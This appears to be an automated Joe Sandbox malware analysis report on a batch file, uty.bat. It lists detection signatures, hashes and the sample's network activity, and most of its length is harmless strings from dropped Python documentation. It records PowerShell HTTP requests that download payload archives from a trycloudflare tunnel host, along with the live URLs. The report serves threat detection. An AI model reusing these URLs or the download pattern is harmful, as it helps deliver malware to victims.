Windows Analysis Report
uty.bat

Overview

General Information

Sample name: uty.bat
Analysis ID: 1657841
MD5: 5006e1fd9bf8308e132593bf22cb010a
SHA1: 0375a81d76878f68afb752334e60d57c946b8e4b
SHA256: 13cb2537f08fe1459fe10d1ee00e52eb8decc866c28ed59a1ba2d0b6cef461ed
Tags: batWsgiDAVuser-JAMESWT_WT
Infos:

Detection

Score: 72
Range: 0 - 100
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Suspicious powershell command line found
Yara detected JavaScript embedded in SVG
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
DNS query to tunneling platform domain
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection

barindex
Source: uty.bat Virustotal: Detection: 14% Perma Link
Source: uty.bat ReversingLabs: Detection: 20%
Source: Submited Sample Neural Call Log Analysis: 99.0%

Phishing

barindex
Source: Yara match File source: C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\tutorial\floatingpoint.html, type: DROPPED
Source: Yara match File source: C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\reference\executionmodel.html, type: DROPPED
Source: Yara match File source: C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\reference\toplevel_components.html, type: DROPPED
Source: unknown HTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.5:49687 version: TLS 1.2
Source: Binary string: <p>The <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> class constructor has a new optional <em>readrc</em> argument source: 3.6.html.19.dr
Source: Binary string: <code class="file docutils literal notranslate"><span class="pre">.pdbrc</span></code> script file.</p></li> source: 3.2.html.19.dr
Source: Binary string: <li><p>The <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> class constructor now accepts a <em>nosigint</em> argument.</p></li> source: 3.2.html.19.dr
Source: Binary string: <li><a href="library/pdb.html#index-1">Pdb (class in pdb)</a>, <a href="library/pdb.html#pdb.Pdb">[1]</a> source: genindex-P.html.19.dr
Source: Binary string: <p>On Windows now <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> supports <code class="docutils literal notranslate"><span class="pre">~/.pdbrc</span></code>. source: 3.9.html.19.dr
Source: Binary string: <li><p>A <code class="file docutils literal notranslate"><span class="pre">.pdbrc</span></code> script file can contain <code class="docutils literal notranslate"><span class="pre">continue</span></code> and <code class="docutils literal notranslate"><span class="pre">next</span></code> commands source: 3.2.html.19.dr
Source: Binary string: <li><a href="library/pdb.html#index-2">.pdbrc</a> source: genindex-F.html.19.dr
Source: Binary string: to control whether <code class="docutils literal notranslate"><span class="pre">.pdbrc</span></code> files should be read.</p> source: 3.6.html.19.dr
Source: unknown DNS query to tunneling platform domain: name: bernard-criterion-consultant-url.trycloudflare.com
Source: Joe Sandbox View IP Address: 104.16.231.132 104.16.231.132
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49687 -> 104.16.231.132:443
Source: global traffic HTTP traffic detected: GET /bab.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bernard-criterion-consultant-url.trycloudflare.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /bab.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bernard-criterion-consultant-url.trycloudflare.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: bernard-criterion-consultant-url.trycloudflare.com
Source: sessions.py.19.dr String found in binary or memory: http://domain.tld/path/to/resource
Source: sessions.py.19.dr String found in binary or memory: http://host.name
Source: powershell.exe, 0000000B.00000002.2036958509.000001E1E55C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2036958509.000001E1E5485000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.1996774219.000001E1D5637000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 3.2.html.19.dr String found in binary or memory: http://python.org/about/#target&#39;
Source: 3.2.html.19.dr String found in binary or memory: http://python.org/about/&#39;
Source: powershell.exe, 0000000B.00000002.1996774219.000001E1D5411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: controller.py.19.dr String found in binary or memory: http://tools.ietf.org/html/draft-ietf-httpbis-p4-conditional-26#section-4.1
Source: powershell.exe, 0000000B.00000002.1996774219.000001E1D5637000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.2041452259.000001E1ED753000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.c
Source: 3.2.html.19.dr String found in binary or memory: http://www.python.org:80/about/&#39;
Source: powershell.exe, 0000000B.00000002.1996774219.000001E1D5411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.1996774219.000001E1D5637000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bernard-criterion-consultant-url.trycloudflare.com
Source: cmd.exe, 00000003.00000002.2622560045.000001B8910BE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1995820938.000001E1D34FF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1995820938.000001E1D34E9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1996532299.000001E1D4F63000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1996390551.000001E1D3694000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2040089599.000001E1ED410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bernard-criterion-consultant-url.trycloudflare.com/FTSP.zip
Source: cmd.exe, 00000003.00000003.2045082056.000001B892F41000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2623500283.000001B892F46000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000003.2045105079.000001B891122000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1996390551.000001E1D3696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1996532299.000001E1D4F63000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1995820938.000001E1D34E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1996390551.000001E1D3694000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bernard-criterion-consultant-url.trycloudflare.com/FTSP.zipHOMEDRIVE=C:HOMEPATH=
Source: powershell.exe, 0000000B.00000002.1995820938.000001E1D34E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bernard-criterion-consultant-url.trycloudflare.com/FTSP.zipy
Source: powershell.exe, 0000000B.00000002.2040089599.000001E1ED410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bernard-criterion-consultant-url.trycloudflare.com/bab.zip
Source: cmd.exe, 00000003.00000002.2622560045.000001B8910B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bernard-criterion-consultant-url.trycloudflare.com/bab.zip...
Source: powershell.exe, 0000000B.00000002.1995820938.000001E1D34FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bernard-criterion-consultant-url.trycloudflare.com/bab.zip?4
Source: powershell.exe, 0000000B.00000002.2040089599.000001E1ED410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bernard-criterion-consultant-url.trycloudflare.com/bab.zipr
Source: powershell.exe, 0000000B.00000002.1995820938.000001E1D34E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bernard-criterion-consultant-url.trycloudflare.com/bab.zips
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10042
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10093
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10160
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10197
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10199
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10220
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10272
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10314
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10321
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10518
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10554
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10586
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10593
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10620
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10679
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10711
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10783
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10827
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10889
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1097797
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10980
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=11016
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=11175
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=11390
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=11798
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=11816
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=11939
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=11959
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=12428
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1286
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=12866
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1289118
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=12892
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=12921
Source: 3.4.html.19.dr, 3.6.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=13248
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=13266
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=13390
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=13477
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=13592
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=13633
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=13773
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=13896
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=14323
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=14377
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=14432
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=14455
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=14470
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=14621
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=14625
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=14631
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=14794
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1492704
Source: 3.4.html.19.dr, 3.5.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15114
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15132
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15204
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15359
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1537721
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15417
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15442
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15452
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15480
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15528
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15596
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15627
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15641
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1565525
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1569291
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15701
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15758
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15805
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15806
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1589
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15958
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16034
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16049
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16110
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16129
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16135
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16136
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16148
Source: 3.2.html.19.dr, 2.7.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1616979
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16203
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16290
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16333
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16351
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16421
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16423
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16464
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16475
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16486
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16488
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16499
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16522
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16595
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16596
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16613
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16624
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16632
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16674
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16685
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16692
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16694
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16709
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16742
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16754
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1675951
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16772
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16832
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16935
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16967
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16997
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17015
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17087
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17094
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17115
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17134
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17150
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17159
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17162
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17201
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17272
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17276
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17323
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17400
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17434
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17457
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17467
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17481
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17485
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17487
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17616
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17618
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17643
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1772673
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1772833
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17741
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17764
Source: 3.2.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1777412
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17804
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17818
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17827
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17828
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17839
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17853
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17914
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17916
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17934
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18011
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18020
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18058
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18065
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18072
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18111
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18138
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18143
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18147
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18149
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18192
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18193
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18194
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18214
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18240
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18338
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18379
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18393
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18408
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18416
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18520
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18532
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18569
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18582
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18585
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18596
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18600
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18626
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18673
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18690
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18725
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18756
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18764
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18771
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18775
Source: 3.4.html.19.dr String found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18794
